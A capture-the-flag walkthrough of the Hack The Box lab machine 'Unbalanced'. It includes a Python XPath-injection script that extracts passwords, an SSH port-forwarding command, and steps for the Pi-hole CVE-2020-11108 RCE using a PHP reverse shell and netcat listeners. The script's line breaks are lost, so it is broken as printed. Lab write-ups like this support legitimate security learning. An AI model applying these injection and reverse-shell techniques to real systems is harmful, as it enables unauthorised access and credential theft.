Unbalanced — HTB Walkthrough

Dhanishtha Awasthi
11 min readJan 11, 2021

--

Well, totally a hard machine, required a lots of nudges and help. Also it took some scripting and XPATH injection and hell of a ride. Without wasting time let’s start.

ENUMERATION

Nmap scan for unbalanced using default scripts and service versions we see.

Port 873 Rsync Enumeration

Using the guide from : https://book.hacktricks.xyz/pentesting/873-pentesting-rsync, we can find the shares. “Conf_backups” which is EncFS-encrypted Configurations Backups.

Trying to enumerate conf_backups doesn’t show auth required so we can list down the shares and also copy contents

To list down what is in conf_backups

Now we will download all files in a folder on our machine

We get all files on our local system

Determining file types of each file I see Data

But among all these is an xml file. Which seems to be the low hanging fruit lets enumerate it

Opening this xml file shows us , what encryption is used

So we have got here encryption types and all the details to decrypt it. We see it is an EncFs encrypted file system.

Let us try to decrypt it

But you see we will need a secret password for the same. So we will try to crack password using john

Encfs2John

We will send whole folder rsync , copied to encrypted , to encfs2john.

A file is created in the folder unbalanced

Now we will use rockyou.txt to crack it

We have got the password. : bubblegum. Now let us create a decrypted system. For this we will first create encrypted directory on

We got the decrypted file system . How ??

The encfs system has a syntax which is used for both encryption and decryption.

We use the file system by mounting it to ROOTDir(the one which we want to encrypt ) . Then we say encfs to create an encrypted file system under name encrypted and we supply password for it + AES encryption like salt and all.

This creates all encrypted files on system + keeps an .encfs.xml file to store password and salt for AES decryption

In the case we have lost our password the only way is to bruteforce it, which we did above, by JTR

Now we again used encfs specifying encrypted and decrypted File systems on ROOTDir

Then supply the password we cracked. This creates the missing decrypted file system , and thus we have recovered our decrypted files. Let’s go back to enumeration

After I cracked the files , I started enumerating it

1) Squid.conf has

a. Domain name && b. Cachemgr password : Thah$Sh1

Lets’ add intranet.unbalanced.htb to host file and move to squid enumeration

PORT 3128 Squid Proxy Enumeration

1) cat /etc/proxychains.conf

2) On browser using foxy-proxy , I made a Proxy named Joker. Which has host 10.10.10.200 and port 3128

Then we access intranet.unbalanced.htb

I tried entering username : cachemgr, Manager or root with password Tha$Sha1

Now after trying to login in, or doing some enum on website I found nothing much. So I asked for a hint and was told to utilize squidclient to know what else can be done using manager password

So we will access mgr menu, and for this we will use squidcleint

We see here any query to disabled status vectors doesn’t work. So I tried enumerating each protected data

Fqdn revealed following

So what it tells is presence of two new hosts. Similarly I enumerated objects

We see here admin page present on website hosted on 172.31.11.3

We see here pihole.unbalanced.htb, Version Info : Pi-hole Version v4.3.2 Web Interface Version v4.3 FTL Version v4.3.1

Also we see 172.13.179.1 is not there . Traversing to which shows site taken down due to security

On traversing to intranet.php , we find the same page , but this page will be vulnerable as this host is mentioned to be

Then I tried to do some simple SQL attacks which were looking to be working , but there was something missing, like if syntax was not what we expected. So digging up more gave Xpath injection

https://www.scip.ch/en/?labs.20180802

Username : ‘ or 1=1 or ‘’=’

Password : Thah$Sha1 or anything

Revealed all usernames

Now to guess the password , we will first guess the length of password

Username : Bryan

Password : ‘] | //*[1][string-length(Password) = ‘7’] | /foo[bar’=

We will do hit and trial in password length , for this we need to make a python script let say, which send value of password length increasing one at a time.

For this capture the request on burp to see , request format

Now we make script

Script

#!/usr/bin/env pythonimport requestsimport stringcharacters = string.printablehttp_proxy = "http://10.10.10.200:3128"proxy_dict = {"http":http_proxy}target_url = "http://172.31.179.1/intranet.php"password = ""end = " "user_no = 3 # Change this to the user number you wantpassword_length = 0def send_request(payload):data = {"Username":"manager","Password":payload}response = requests.post(target_url,data=data,proxies=proxy_dict)return responsefor length in range(1, 101):print("\rTrying :" + str(length) + end)length_payload = "'] | //*[" + str(user_no) + "][string-length(Password) = " + str(length) + "] | /foo [bar = '"temp = send_request(length_payload)if "Invalid credentials." not in temp.text:password_length = lengthprint("\nLength of the password is : " + str(length) + "\n")breakfor i in range(1,password_length + 1):for j in characters:if j != "'":print("\rChecking position " + str(i) + " for character: " + str(j),end)payload = "']|//*[" + str(user_no) + "][substring(Password," + str(i) + ",1) = '" + str(j) + "'] | /foo [bar = '"response = send_request(payload)if "Invalid credentials." not in response.text:print("\nPasswords " + str(i) + " character is : " + str(j))password = password + str(j)breakprint("\nThe password is : " + str(password))
ireallyl0vebubblegum!!!

username : bryan && Password : ireallyl0vebubblegum!!!

Great , so I tried SSH and got the shell

EXPLOITATION

Enumerating more

So we see here two things

1) Left task for users are : To set intranet-host 1 back to load balancer

2) To set up Pi-Hole server

— — — Juicy Info : Pi-Hole is running on local interface

— — — Pi-Hole has admin password set somewhere

I did dpkg -l , to list all the packages. and saw wget is allowed to run. So I transferred netstat from my kali to the machine

On attacker machine

On victim machine

We can see two ports attached to local host and any one on them is docker. So we did transfer ifconfig, the same way we did netstat

Running ifconfig shows docker is on interface 172.17.0.1, but as per to-do list, pi-hole is accessible only through local host

So now we will try to set up a SSH tunnel. First I tried to setup tunnel through kali — — Local port forwarding

ssh -L 8888:127.0.0.1:8080 bryan@10.10.10.200

and traversing through 127.0.0.1:8888 gave me

I wasn’t convinced . I thought there might be some tunneling issues, wrong directions, so I tried reverse tunneling from victim machine

For this we need to add our kali public key to authorized_keys in victim machine

first create directory .ssh in bryan’s home folder and then, transfer your authorized_keys to victims’ ssh folder

First create ssh keys on kali using ssh-keygen, if not done, then

on attacker machine

and on victim machine

Make sure that you run the ssh server on kali

Port forwarding

in netstat output we can see, 10.10.10.200 has established an ssh connection to 10.10.14.18 port 22. Browsing to server

Now that we have pi-hole page, we can find the version exploit for pi-hole 4.3.2 which is an authenticated RCE. To execute that we need to authenticate ourselves. Enumerating admin username password on machine

1) I tried all basic files for pi-hole like /usr/local/bin/pihole, /etc/pihole, but there was nothing

2) Also there was docker folder in /etc/ which had key.json. I tried to find something but none of interest.

after all this I went back to TODO ,and found

1) set temporary admin password

o first I tried user: pi password : raspberry

2) then I realized being dumb, it was admin that was the password

Authenticate to Pi-Hole page

Now to exploit the RCE , just download python script from here

https://www.exploit-db.com/exploits/48727

and run on attacker machine

PRIVILEGE ESCALATION

Enumerating for root

I found a web password , nothing much, we will use this

https://frichetten.com/blog/cve-2020-11108-pihole-rce/#pk_campaign=github

first open settings →blocklist — -> disable all present blocklists

then add new URL

Open netcat listener on at port 80 on attacker machine, then click save and update

we receive a response on netcat.

Now we will send the data as follows and hit enter twice, then ctrl +c

as soon as we hit ctrl+c, we get the following output on server

Now we will again set a netcat listener on at port 80

and click “Update” to update Gravity a second time. This time you should see “.domains” in the response. This is indicative you have performed the exploit correctly up to this point. Hit enter, and then paste whatever PHP payload you’d like. A shell function call works very nicely. Then hit Ctrl+c to kill netcat.

The above php code is php-reverse-shell.php from pentest monkey, Now we turn our listener on at port 1234'

Then we press ctrl+c , on http response. We see following on server

Now we run pihole change password command from www-data

and on netcat

Downloaded both the files on my system

on attacker machine

Opening both the files, I found a password in pihole_config.sh

Then I used su root , to switch to root and used this password and we get root

bUbBl3gUm$43v3Ry0n3!

ROOTED !!!

--

--